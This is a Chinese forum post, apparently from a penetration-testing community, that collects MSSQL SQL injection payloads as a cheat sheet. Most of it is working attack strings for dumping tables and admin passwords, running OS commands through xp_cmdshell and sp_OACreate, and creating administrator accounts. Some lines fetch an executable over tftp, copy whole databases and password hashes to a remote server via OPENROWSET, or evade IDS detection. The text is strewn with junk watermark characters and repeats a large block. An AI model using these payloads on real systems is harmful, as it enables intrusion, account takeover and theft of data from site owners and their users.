关于mssql数据库下的一些注入技巧
小弟刚来,发点小文章给各位看官养养眼吧,都是平时渗透测试时的一些思路总结。见笑了
Sql的注射最早源于’or’1’=’1)
最重要的表名:
select * from sysobjectswww.t00ls.net$ y/ _8 j5 Y0 L( Q+ Y# M
sysobjects ncsysobjects
sysindexes tsysindexeswww.t00ls.net7 _4 u) d' E$ k$ g& m* J
syscolumns
systypes3 `3 d* n9 k# D$ C* S. o& K
sysusers
sysdatabases3 @* m9 e- C) n# f. p
sysxlogins8 M5 E) ~8 d7 g' Y0 d3 [5 u, L9 {
sysprocesses
最重要的一些用户名(默认sql数据库中存在着的)
public2 y5 t: ]: M$ r# s: u" _
dbo
guest(一般禁止,或者没权限)
db_sercurityadminwww.t00ls.net3 J4 t+ ^6 x. r, {3 g7 e
ab_dlladmin
一些默认扩展
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevaluewww.t00ls.net; W: k5 H7 q' E7 R% h- e( S
xp_regenumkeys
xp_regenumvalues# e2 j7 c0 N4 V
xp_regreadT00LS - 低调求发展$ R& j" ~0 Y7 g# U; M
xp_regremovemultistringwww.t00ls.net1 I2 B5 O4 G" _3 p# ^' R5 S3 n
xp_regwrite
xp_availablemedia 驱动器相关0 Z% M. ? v6 Y8 c* w
xp_dirtree 目录
xp_enumdsn ODBC连接
xp_loginconfig 服务器安全模式信息. w, X- g$ w ^; m6 Z! K: y
xp_makecab 创建压缩卷www.t00ls.net( Q8 g3 r0 I4 E% j0 |, |9 ?6 [( G
xp_ntsec_enumdomains domain信息
xp_terminate_process 终端进程,给出一个PID* x q# G8 B5 b+ Q' ^
例如: F, R- g; N& k7 E
sp_addextendedproc ’xp_webserver’, ’c:/temp/xp_foo.dll’3 V9 ?2 Z, R1 \! T9 P8 ~8 [
exec xp_webserver
sp_dropextendedproc ’xp_webserver’
bcp "select * FROM test..foo" queryout c:/inetpub/wwwroot/runcommand.asp -c -Slocalhost -Usa -Pfoobarwww.t00ls.net3 ^5 w. r$ S, C7 a8 J) f
’ group by users.id having 1=1-4 F; b7 u, }$ S* ?
’ group by users.id, users.username, users.password, users.privs having 1=1-T00LS - 低调求发展+ D D, U# \; M( _5 k: ~+ X
’; insert into users values( 666, ’attacker’, ’foobar’, 0xffff )-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’logintable’-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’logintable’ where COLUMN_NAME NOT IN (’login_id’)-7 C( [3 p# |. a, X2 Q# l
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’logintable’ where COLUMN_NAME NOT IN (’login_id’,’login_name’)-
union select TOP 1 login_name FROM logintable-
union select TOP 1 password FROM logintable where login_name=’Rahul’--; U) k- O* h: O: p1 j3 |# _2 n g1 u
构造语句:查询是否存在xp_cmdshellwww.t00ls.net* z9 G7 h/ m$ t) o0 P
’ union select @@version,1,1,1--$ z6 b3 a8 H' `% d7 F& W
and 1=(select @@VERSION)! M# t, W4 x9 {: P6 `/ E5 V% }5 y
and ’sa’=(select System_user)
’ union select ret,1,1,1 from foo--
’ union select min(username),1,1,1 from users where username > ’a’-
’ union select min(username),1,1,1 from users where username > ’admin’-
’ union select password,1,1,1 from users where username = ’admin’--& }: q% l: t0 ^' s2 ?% P
and user_name()=’dbo’www.t00ls.net. {& c) k( P7 Y" v0 C5 I$ X5 W
and 0<>(select user_name()-
; DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C:/WIndows/system32/cmd.exe /c net user admin 123456 /add’
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = ’X’ AND name = ’xp_cmdshell’)
;EXEC master.dbo.sp_addextendedproc ’xp_cmdshell’, ’xplog70.dll’
1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype=’x’%20and%20name=’xp_cmdshell’)
and 1=(select IS_SRVROLEMEMBER(’sysadmin’)) 判断sa权限是否. u& [, I! l4 t3 `
and 0<>(select top 1 paths from newtable)-- 暴库大法
and 1=(select name from master.dbo.sysdatabases where dbid=7) 得到库名(从1到5都是系统的id,6以上才可以判断)
创建一个虚拟目录E盘:5 r5 N5 l w9 v# {$ x& [
declare @o int exec sp_oacreate ’wscript.shell’, @o out exec sp_oamethod @o, ’run’, NULL,’ cscript.exe c:/inetpub/wwwroot/mkwebdir.vbs -w "默认 Web 站点" -v "e","e:/"’
访问属性:(配合写入一个webshell)
declare @o int exec sp_oacreate ’wscript.shell’, @o out exec sp_oamethod @o, ’run’, NULL,’ cscript.exe c:/inetpub/wwwroot/chaccess.vbs -a w3svc/1/ROOT/e +browse’6 ?) W! i! i8 q) V* t6 f$ M
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的数据库名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’) 暴到一个表 假设为 adminT00LS - 低调求发展% ~! N) s0 o9 i$ O2 B1 f
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’ and name not in (’Admin’)) 来得到其他的表。, _- {) k' Q/ t3 S
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=’U’ and name=’admin’3 ?" @! S9 O7 W/ Z E1 @0 d
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=idwww.t00ls.net4 `& m+ A: n; c
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_id9 Y) A3 M. F6 t0 t8 ~
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
(’id’,...)) 来暴出其他的字段
and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名www.t00ls.net! y3 f4 D9 Q0 X8 H; u0 u6 k& z4 B
依次可以得到密码。。。。。假设存在user_id username ,password 等字段
Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin( S4 j# N& }8 D" l! Q) l
(union语句到处风靡啊,access也好用
暴库特殊技巧::%5c=’/’ 或者把/和/ 修改%5提交
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)T00LS - 低调求发展2 v, }# _ |# B; J
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’) 得到表名+ v& i! C! r8 a9 ~8 P/ |7 p
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’ and name not in(’Address’))6 C- T5 }' g& x
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=’U’ and name=’admin’ and uid>(str(id))) 判断id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段3 }7 x# i7 e* L, G( g2 ?5 D- Y" ~
http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass][char](255));--
http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1www.t00ls.net% x b1 j, }3 U' [; G7 C+ _3 s. E* N. K
;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=’HKEY_LOCAL_MACHINE’, @key=’SYSTEM/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots/’, @value_name=’/’, values=@test OUTPUT insert into paths(path) values(@test)www.t00ls.net5 `: {. }9 c/ S* t) |* L
http://61.131.96.39/PageShow.asp?TianName=政 策法规&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master; declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--
得到了web路径d:/xxxx,接下来:) A& j3 G8 {7 S3 V0 Y0 b( G
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--www.t00ls.net- n! e2 @9 v' P$ G, X7 [ e, {
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--3 g; z6 G1 s$ R9 r( ~
传统的存在xp_cmdshell的测试过程:
;exec master..xp_cmdshell ’dir’
;exec master.dbo.sp_addlogin hax;--
;exec master.dbo.sp_password null,hax,hax;--
;exec master.dbo.sp_addsrvrolemember hax sysadmin;--
;exec master.dbo.xp_cmdshell ’net user admin 123456 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;--6 b* a& E R6 G5 G+ K1 e/ z" L
;exec master.dbo.xp_cmdshell ’net localgroup administrators admin /add’;--T00LS - 低调求发展! ^- z0 l! U) e
exec master..xp_servicecontrol ’start’, ’schedule’
exec master..xp_servicecontrol ’start’, ’server’9 L' b ]# {/ c- r' @" ^/ a
http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C:/WINNT/system32/cmd.exe /c net user admin 123456 /add’
;DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C:/WINNT/system32/cmd.exe /c net localgroup administrators admin /add’4 U& K7 C+ K- o* O1 ]0 u$ [9 z* r
http://localhost/show.asp?id=1'; exec master..xp_cmdshell ’tftp -i youip get file.exe’- _* y4 W( N' Q2 B3 d3 x+ ^
declare @a sysname set @a=’xp_’+’cmdshell’ exec @a ’dir c:/’% l' D: T& [' k/ y
declare @a sysname set @a=’xp’+’_cm’+’dshell’ exec @a ’dir c:/’ f: Z5 ~* K6 z+ K% e: A# K
;declare @a;set @a=db_name();backup database @a to disk=’你的IP你的共享目录bak.dat’www.t00ls.net- G( r0 T; a: _# Y, t, L6 x% N
如果被限制则可以。T00LS - 低调求发展1 _" w- x+ Q- k* I* R
select * from openrowset(’sqloledb’,’server’;’sa’;’’,’select ’’OK!’’ exec master.dbo.sp_addlogin hax’)
传统查询构造:
select * FROM news where id=... AND topic=... AND ....." O0 c3 R' V- b k
admin’and 1=(select count(*) from [user] where username=’victim’ and right(left(userpass,01),1)=’1’) and userpass <>’T00LS - 低调求发展 e; n1 s" \$ a) @
select 123;--
;use master;--5 g7 p/ v2 Y {# U4 s& Q- L
:a’ or name like ’fff%’;-- 显示有一个叫ffff的用户哈。T00LS - 低调求发展! p; d V$ ]# o
’and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype=’u’ and status>0) where name=’ffff’;--
说明:
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。, t4 O5 K M* R/ U$ U* s
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID. P3 j, O8 g3 H% ^ j: V
ffff’;update [users] set email=(select top 1 id from sysobjects where xtype=’u’ and name=’ad’) where name=’ffff’;--T00LS - 低调求发展+ W/ x" b/ `, V6 n4 `
象下面这样就可以得到第二个表的名字了: f: f9 b2 o: V3 o. ]/ _9 M
ffff’;update [users] set email=(select top 1 name from sysobjects where xtype=’u’ and id>581577110) where name=’ffff’;--
ffff’;update [users] set email=(select top 1 count(id) from password) where name=’ffff’;--0 B! K4 a: R/ |5 a% v' m
ffff’;update [users] set email=(select top 1 pwd from password where id=2) where name=’ffff’;--
ffff’;update [users] set email=(select top 1 name from password where id=2) where name=’ffff’;--
exec master..xp_servicecontrol ’start’, ’schedule’( L( B* `" n' }8 J3 k# y+ W
exec master..xp_servicecontrol ’start’, ’server’www.t00ls.net* [0 X" D% s( }7 I/ [7 X
sp_addextendedproc ’xp_webserver’, ’c:/temp/xp_foo.dll’
扩展存储就可以通过一般的方法调用:+ E' N1 G& ?, M
exec xp_webserver4 e0 p' ^+ |. r% C
一旦这个扩展存储执行过,可以这样删除它:% a j& R9 q! L ?# O6 [
sp_dropextendedproc ’xp_webserver’! r, P k( b# p3 a2 ]2 ?
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-T00LS - 低调求发展' q3 N7 N# J }+ j3 v
insert into users values( 667,123,123,0xffff)-
insert into users values ( 123, ’admin’’--’, ’password’, 0xffff)-
;and user>0+ f4 l6 u6 }, q1 ]% v& r7 K
;;and (select count(*) from sysobjects)>0
;;and (select count(*) from mysysobjects)>0 //为access数据库, `- l" G% w% g8 n
-----------------------------------------------------------通常注射的一些介绍:+ j( z# }3 B- D X8 K
A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:- O3 z: |" Y2 U# X P4 }
select * from 表名 where 字段=49" c! @) a! O$ F+ T
注入的参数为ID=49 And [查询条件],即是生成语句:
select * from 表名 where 字段=49 And [查询条件]
(B) Class=连续剧 这类注入的参数是字符型,SQL语句原貌大致概如下:
select * from 表名 where 字段=’连续剧’" L, T$ v; G& w! C0 l( ]
注入的参数为Class=连续剧’ and [查询条件] and ’’=’ ,即是生成语句:
select * from 表名 where 字段=’连续剧’ and [查询条件] and ’’=’’
(C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
select * from 表名 where 字段like ’%关键字%’% j4 q% d' N: C( ^0 N. j3 U
注入的参数为keyword=’ and [查询条件] and ’%25’=’, 即是生成语句:/ o6 v+ A& F/ S
select * from 表名 where字段like ’%’ and [查询条件] and ’%’=’%’
;;and (select Top 1 name from sysobjects where xtype=’U’ and status>0)>08 H6 t: y0 t& O% t) k1 B) k
sysobjects是SQLServer的系统表,存储着所有的表名、视图、约束及其它对象,xtype=’U’ and status>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。www.t00ls.net% b, H! S V, Q. ^- Y/ [% V
;;and (select Top 1 col_name(object_id(’表名’),1) from sysobjects)>0
从⑤拿到表名后,用object_id(’表名’)获取表名对应的内部ID,col_name(表名ID,1)代表该表的第1个字段名,将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。
post.htm内容:主要是方便输入。T00LS - 低调求发展) B7 N3 t& o1 X) z6 B7 F* F8 Y V
枚举出他的数据表名:
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0);--
这是将第一个表名更新到aaa的字段处。4 |: X9 D! X8 B8 j. A+ n
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>’刚才得到的表名’)。
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0 and name<>’vote’);--6 N0 y( _; B _! x
然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表,^^^^^^一个个的读出,直到没有为止。2 [8 [6 j3 G$ ]
读字段是这样:
id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),1));--: l& C; U) Y: O. S7 n" G1 l E$ A
然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名4 y3 e+ Z3 z. b* O# }" y; a+ a
id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),2));--3 s( I- R; m# [) B
然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名" ?' X& `! k) [( u9 W0 g, u4 O8 `
--------------------------------高级技巧:
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]% m- J4 v. v6 M) D. }6 _" [
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>’你得到的表名’ 查出一个加一个]) [ where 条件]6 o+ L& V) ?8 f7 k- ?: d; H
select top 1 name from sysobjects where xtype=u and status>0 and name not in(’table1’,’table2’,…)www.t00ls.net5 l8 b1 e& F/ }! z. q
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组] a! J6 A q8 b+ b2 E
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_name(object_id(’要查询的数据表名’),字段列如:1) [ where 条件]2 H% \5 }/ D* X1 e8 U
绕过IDS的检测[使用变量]
declare @a sysname set @a=’xp_’+’cmdshell’ exec @a ’dir c:/’
declare @a sysname set @a=’xp’+’_cm’+’dshell’ exec @a ’dir c:/’
1、 开启远程数据库
基本语法- \) p/ F) A" f( d" m* O
select * from OPENROWSET(’SQLOLEDB’, ’server=servername;uid=sa;pwd=apachy_123’, ’select * from table1’ )5 t: z" w+ D+ ?
参数: (1) OLEDB Provider name8 O: D$ a K- B5 Y" F, Q8 Y
2、 其中连接字符串参数可以是任何和端口用来连接,比如
select * from OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from table’3 H9 A: U; X0 }
要复制目标主机的整个数据库,首先要在目标主机上和自己机器上的数据库建立连接(如何在目标主机上建立远程连接,刚才已经讲了),之后insert所有远程表到本地表。# j" Z; u. q8 U0 W
基本语法:. y) c6 A* O/ E5 [
insert into OPENROWSET(’SQLOLEDB’, ’server=servername;uid=sa;pwd=apachy_123’, ’select * from table1’) select * from table2
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from table1’) select * from table2
insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=f19ht;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from _sysdatabases’)$ ~; r% Y' a* P$ }! Z O, ?
select * from master.dbo.sysdatabases2 r5 {; D b7 }- ^' O4 ?
insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=f19ht;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from _sysobjects’)
select * from user_database.dbo.sysobjects
insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from _syscolumns’)T00LS - 低调求发展8 n5 y J! [: L
select * from user_database.dbo.syscolumns0 U& n$ R+ W8 L" w7 k
之后,便可以从本地数据库中看到目标主机的库结构,这已经易如反掌,不多讲,复制数据库:
insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from table1’) select * from database..table1
insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from table2’) select * from database..table2www.t00ls.net/ ] A- e i4 @) ]9 ]
......
3、 复制哈西表(HASH)
这实际上是上述复制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下:
insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from _sysxlogins’) select * from database.dbo.sysxlogins; Y$ P+ Z% C* s3 C- p% N3 s9 i& P
得到hash之后,就可以进行暴力破解。这需要一点运气和大量时间。) E. |" r, u0 K- } @3 F" I
遍历目录的方法:/ q B5 I6 n8 @' y
先创建一个临时表:temp
5’;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--0 p% q4 w* i7 ?
5’;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器www.t00ls.net3 _* I. y' d7 m: F
5’;insert into temp(id) exec master.dbo.xp_subdirs ’c:/’;-- 获得子目录列表T00LS - 低调求发展; r T: V9 n* H0 b8 G7 {$ ?: }& C
5’;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- 获得所有子目录的目录树结构,并寸入temp表中
5’;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:/web/index.asp’;-- 查看某个文件的内容% U' t2 s: E2 F% p: e$ c
5’;insert into temp(id) exec master.dbo.xp_cmdshell ’dir c:/’;--
5’;insert into temp(id) exec master.dbo.xp_cmdshell ’dir c:/ *.asp /s/a’;--
5’;insert into temp(id) exec master.dbo.xp_cmdshell ’cscript C:/Inetpub/AdminScripts/adsutil.vbs enum w3svc’
5’;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- (xp_dirtree适用权限PUBLIC)www.t00ls.net6 a# Z: v' D. g5 P/ F
写入表:T00LS - 低调求发展- Y! X$ N9 v# w* ?* e
语句1:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--# _3 K ~, o7 b" m5 P
语句2:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--
语句3:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--- v& H) F0 [9 i5 }
语句4:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--0 b1 E1 S$ Y# f6 D8 o
语句5:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--
语句6:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--T00LS - 低调求发展6 q! N+ G- N8 } v
语句7:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--T00LS - 低调求发展" m. j. `+ |! B: D
语句8:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--T00LS - 低调求发展3 e! R6 o+ D+ X
语句9:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER(’db_owner’));--8 b( H+ ^; `- d0 {" x1 y* _
把路径写到表中去:
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)-
http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ’c:/’-. O5 v/ v7 u" V6 r. V; A, e0 ]
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-T00LS - 低调求发展, o3 b, l t( z: G% \; R- t/ \+ o
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in(’@Inetpub’))-3 x/ J) j6 D# L! m
语句:http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--
语句:http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ’e:/web’--4 \# _& s7 C3 B& J
语句:http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)-5 m8 W/ v1 V% G# ?$ D
把数据库备份到网页目录:下载9 V' X- g% ]) K( ?: [# Y& S. u$ W
http://http://www.xxxxx.com/down/list.asp?id=1;declare @a sysname; set @a=db_name();backup database @a to disk=’e:/web/down.bak’;--" ^* o3 b5 L+ }5 |3 e$ L
and%201=(select%20top%201%20name%20from(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc)
and%201=(select%20Top%201%20col_name(object_id(’USER_LOGIN’),1)%20from%20sysobjects) 参看相关表。www.t00ls.net5 \; m- \% \; \2 e H
and 1=(select%20user_id%20from%20USER_LOGIN)+ N( o% R0 a- w3 F6 w8 P
and%200=(select%20user%20from%20USER_LOGIN%20where%20user>1)T00LS - 低调求发展* y: I) u. W6 _% a: m( N
如果可以通过连接符注释掉后面的验证,那么就更有意思了,来看我们能作什么:8 g! d s/ c; N
a、在用户名位置输入【admin’;exec master.dbo.sp_addlogin Cool;--】,添加一个sql用户* ^7 \( t- X3 @( c
b、在用户名位置输入【admin’;exec master.dbo.sp_password null,123456,Cool;--】,给Cool设置密码为123456www.t00ls.net. k. c/ r1 ^7 A! D! B: v
c、在用户名位置输入【admin’;exec master.dbo.sp_addsrvrolemember Cool,sysadmin;--】,给Cool赋予System Administrator权限
Sql的注射最早源于’or’1’=’1)
最重要的表名:
select * from sysobjectswww.t00ls.net$ y/ _8 j5 Y0 L( Q+ Y# M
sysobjects ncsysobjects
sysindexes tsysindexeswww.t00ls.net7 _4 u) d' E$ k$ g& m* J
syscolumns
systypes3 `3 d* n9 k# D$ C* S. o& K
sysusers
sysdatabases3 @* m9 e- C) n# f. p
sysxlogins8 M5 E) ~8 d7 g' Y0 d3 [5 u, L9 {
sysprocesses
最重要的一些用户名(默认sql数据库中存在着的)
public2 y5 t: ]: M$ r# s: u" _
dbo
guest(一般禁止,或者没权限)
db_sercurityadminwww.t00ls.net3 J4 t+ ^6 x. r, {3 g7 e
ab_dlladmin
一些默认扩展
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevaluewww.t00ls.net; W: k5 H7 q' E7 R% h- e( S
xp_regenumkeys
xp_regenumvalues# e2 j7 c0 N4 V
xp_regreadT00LS - 低调求发展$ R& j" ~0 Y7 g# U; M
xp_regremovemultistringwww.t00ls.net1 I2 B5 O4 G" _3 p# ^' R5 S3 n
xp_regwrite
xp_availablemedia 驱动器相关0 Z% M. ? v6 Y8 c* w
xp_dirtree 目录
xp_enumdsn ODBC连接
xp_loginconfig 服务器安全模式信息. w, X- g$ w ^; m6 Z! K: y
xp_makecab 创建压缩卷www.t00ls.net( Q8 g3 r0 I4 E% j0 |, |9 ?6 [( G
xp_ntsec_enumdomains domain信息
xp_terminate_process 终端进程,给出一个PID* x q# G8 B5 b+ Q' ^
例如: F, R- g; N& k7 E
sp_addextendedproc ’xp_webserver’, ’c:/temp/xp_foo.dll’3 V9 ?2 Z, R1 \! T9 P8 ~8 [
exec xp_webserver
sp_dropextendedproc ’xp_webserver’
bcp "select * FROM test..foo" queryout c:/inetpub/wwwroot/runcommand.asp -c -Slocalhost -Usa -Pfoobarwww.t00ls.net3 ^5 w. r$ S, C7 a8 J) f
’ group by users.id having 1=1-4 F; b7 u, }$ S* ?
’ group by users.id, users.username, users.password, users.privs having 1=1-T00LS - 低调求发展+ D D, U# \; M( _5 k: ~+ X
’; insert into users values( 666, ’attacker’, ’foobar’, 0xffff )-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’logintable’-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’logintable’ where COLUMN_NAME NOT IN (’login_id’)-7 C( [3 p# |. a, X2 Q# l
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’logintable’ where COLUMN_NAME NOT IN (’login_id’,’login_name’)-
union select TOP 1 login_name FROM logintable-
union select TOP 1 password FROM logintable where login_name=’Rahul’--; U) k- O* h: O: p1 j3 |# _2 n g1 u
构造语句:查询是否存在xp_cmdshellwww.t00ls.net* z9 G7 h/ m$ t) o0 P
’ union select @@version,1,1,1--$ z6 b3 a8 H' `% d7 F& W
and 1=(select @@VERSION)! M# t, W4 x9 {: P6 `/ E5 V% }5 y
and ’sa’=(select System_user)
’ union select ret,1,1,1 from foo--
’ union select min(username),1,1,1 from users where username > ’a’-
’ union select min(username),1,1,1 from users where username > ’admin’-
’ union select password,1,1,1 from users where username = ’admin’--& }: q% l: t0 ^' s2 ?% P
and user_name()=’dbo’www.t00ls.net. {& c) k( P7 Y" v0 C5 I$ X5 W
and 0<>(select user_name()-
; DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C:/WIndows/system32/cmd.exe /c net user admin 123456 /add’
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = ’X’ AND name = ’xp_cmdshell’)
;EXEC master.dbo.sp_addextendedproc ’xp_cmdshell’, ’xplog70.dll’
1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype=’x’%20and%20name=’xp_cmdshell’)
and 1=(select IS_SRVROLEMEMBER(’sysadmin’)) 判断sa权限是否. u& [, I! l4 t3 `
and 0<>(select top 1 paths from newtable)-- 暴库大法
and 1=(select name from master.dbo.sysdatabases where dbid=7) 得到库名(从1到5都是系统的id,6以上才可以判断)
创建一个虚拟目录E盘:5 r5 N5 l w9 v# {$ x& [
declare @o int exec sp_oacreate ’wscript.shell’, @o out exec sp_oamethod @o, ’run’, NULL,’ cscript.exe c:/inetpub/wwwroot/mkwebdir.vbs -w "默认 Web 站点" -v "e","e:/"’
访问属性:(配合写入一个webshell)
declare @o int exec sp_oacreate ’wscript.shell’, @o out exec sp_oamethod @o, ’run’, NULL,’ cscript.exe c:/inetpub/wwwroot/chaccess.vbs -a w3svc/1/ROOT/e +browse’6 ?) W! i! i8 q) V* t6 f$ M
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的数据库名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’) 暴到一个表 假设为 adminT00LS - 低调求发展% ~! N) s0 o9 i$ O2 B1 f
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’ and name not in (’Admin’)) 来得到其他的表。, _- {) k' Q/ t3 S
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=’U’ and name=’admin’3 ?" @! S9 O7 W/ Z E1 @0 d
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=idwww.t00ls.net4 `& m+ A: n; c
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_id9 Y) A3 M. F6 t0 t8 ~
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
(’id’,...)) 来暴出其他的字段
and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名www.t00ls.net! y3 f4 D9 Q0 X8 H; u0 u6 k& z4 B
依次可以得到密码。。。。。假设存在user_id username ,password 等字段
Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
